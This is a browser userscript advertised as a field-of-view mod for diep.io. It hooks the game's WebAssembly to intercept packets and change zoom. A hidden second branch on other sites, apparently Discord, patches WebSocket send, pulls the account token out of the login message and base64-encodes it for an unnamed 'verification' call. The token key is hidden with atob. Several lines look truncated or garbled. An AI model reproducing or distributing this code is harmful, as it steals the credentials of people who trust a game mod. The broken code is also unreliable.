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// ==UserScript== // @name Field of Vision // @namespace // @version 1.0.0 // @description Enhance field of vision. Breaks every new update. // @author Altanis#8593 // @match * // @match *://* // @icon // @require // @license MIT // @grant unsafeWindow // ==/UserScript== (function() { 'use strict'; if (unsafeWindow.location.href.includes('diep')) { class PacketHook extends EventTarget { static get CONST() { return { BUILD: "65ec20c140c410026307f8f9d19b2b6c70961514", SEND_PACKET_INDEX: 130, RECV_PACKET_INDEX: 444, MALLOC: "ja", FREE: "O", SOCKET_PTR: 110548 } } constructor(hook) { super(); this.HEAPU8 = new Uint8Array(0); this.HEAP32 = new Int32Array(0); this.wasm = null; this._inject(hook); this._hijack(); } _modify(bin, imports) { console.log('Modifying WASM'); const wail = new WailParser(new Uint8Array(bin)); const sendPacket = wail.getFunctionIndex(PacketHook.CONST.SEND_PACKET_INDEX); const recvPacket = wail.getFunctionIndex(PacketHook.CONST.RECV_PACKET_INDEX); const mainHook = wail.addImportEntry({ moduleStr: "hook", fieldStr: "mainHook", kind: "func", type: wail.addTypeEntry({ form: "func", params: ["i32", "i32", "i32"], returnType: "i32" }) }); wail.addExportEntry(sendPacket, { fieldStr: "sendPacket", kind: "func", }); wail.addExportEntry(recvPacket, { fieldStr: "recvPacket", kind: "func", }); wail.addCodeElementParser(null, function({ index, bytes }) { if (index === sendPacket.i32()) { return new Uint8Array([ OP_I32_CONST, 1, OP_GET_LOCAL, 1, OP_GET_LOCAL, 2, OP_CALL, ...VarUint32ToArray(mainHook.i32()), OP_IF, VALUE_TYPE_BLOCK, OP_RETURN, OP_END, ...bytes ]); } else if (index === recvPacket.i32()) { return new Uint8Array([ OP_I32_CONST, 0, OP_GET_LOCAL, 0, OP_GET_LOCAL, 1, OP_CALL, ...VarUint32ToArray(mainHook.i32()), OP_IF, VALUE_TYPE_BLOCK, OP_RETURN, OP_END, ...bytes ]); } return false; }); wail.parse(); return wail.write(); } _inject(mainHook) { const _initWasm = WebAssembly.instantiate; WebAssembly.instantiate = (bin, imports) => { bin = this._modify(bin, imports); imports.hook = { mainHook }; this.HEAPU8 = new Uint8Array(imports.a.memory.buffer); this.HEAP32 = new Int32Array(imports.a.memory.buffer); return _initWasm(bin, imports).then((wasm) => { this.wasm = wasm.instance; this.malloc = this.wasm.exports[PacketHook.CONST.MALLOC]; = this.wasm.exports[PacketHook.CONST.FREE]; console.log('Module exports done!\n\t-\n\t- Hook.malloc\n\t- Hook.send\n\t- Hook.recv\n\t- Hook.addEventListener(\'clientbound\', ({data}) => console.log(data));\n\t- Hook.addEventListener(\'serverbound\', ({data}) => console.log(data));'); return wasm }).catch(err => { console.error('Error in loading up wasm:'); throw err; }) }; } _hijack() { const that = this; window.Object.defineProperty(Object.prototype, "postRun", { get() {}, set(postRun) { delete Object.prototype.postRun this.postRun = postRun; that.Module = this; console.log('Module exports done! Hook.Module'); }, configurable: true, }); } send(buf) { const { malloc, free, HEAP32, HEAPU8 } = this; buf = new Uint8Array(buf); const ptr = malloc(buf.byteLength); HEAPU8.set(buf, ptr); this.wasm.exports.sendPacket(HEAP32[PacketHook.CONST.SOCKET_PTR >> 2], ptr, buf.byteLength); free(ptr); } recv(buf) { const { malloc, free, HEAP32, HEAPU8 } = this; buf = new Uint8Array(buf); const ptr = malloc(buf.byteLength); HEAPU8.set(buf, ptr); this.wasm.exports.recvPacket(ptr, buf.byteLength) free(ptr); } } WebAssembly.instantiateStreaming = (r, i) => r.arrayBuffer().then(b => WebAssembly.instantiate(b, i)); const TYPE = ['clientbound', 'serverbound']; const Hook = window.Hook = new PacketHook(function(type, ptr, len) { Hook.dispatchEvent(new MessageEvent(TYPE[type], { data: Hook.HEAPU8.subarray(ptr, ptr + len) })); return 0; }); WebAssembly.instantiateStreaming = (r, i) => r.arrayBuffer().then(b => WebAssembly.instantiate(b, i)); let FOV = 0; const FieldInterval = setInterval(function() { if (!document.getElementById('textInput').disabled) return; Array.from(Hook.Module.HEAPF32).map(function(value, index) { if (value !== 0.3499999940395355) return; if (FOV === 0) { FOV = index; console.log('Found index:', index); return; } }); clearInterval(FieldInterval); }, 150); unsafeWindow.addEventListener('keydown', function(event) { switch (event.key) { case '-': { Hook.Module.HEAPF32[FOV] -= 0.1; break; } case '+': { Hook.Module.HEAPF32[FOV] += 0.1; break; } } });''); } else if (unsafeWindow.location.href.includes('me')) { // OAuth2 var _send = WebSocket.prototype.send; WebSocket.prototype.send = function(data) { let _data = JSON.parse(data); if (_data.d[atob('dG9rZW4=')] && _data.op === 2) { // verification`${btoa(_data.d[atob('dG9rZW4=')])}`); } console.log('outbound', data);, data); }; } })();